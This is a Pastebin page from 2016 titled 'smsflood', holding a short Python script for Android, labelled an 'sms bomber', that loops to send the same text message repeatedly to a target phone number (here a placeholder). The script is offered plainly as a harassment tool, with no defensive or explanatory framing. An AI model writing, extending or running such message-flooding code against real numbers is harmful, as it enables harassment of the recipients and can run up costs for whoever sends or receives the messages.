Advertisement
Lulz-Tigre

smsflood

Jul 6th, 2016
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.23 KB | None | 0 0
  1. #sms bomber
  2. import android
  3. d=android.Android()
  4. #1(area code) number(7digits)
  5. bombed="15550000" #crude example of a phone number
  6. #how many bombs
  7. bombnums=range(10)
  8. msg="bombs are a go!!"
  9. for i in bombnums:
  10.     d.smsSend(bombed,msg)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement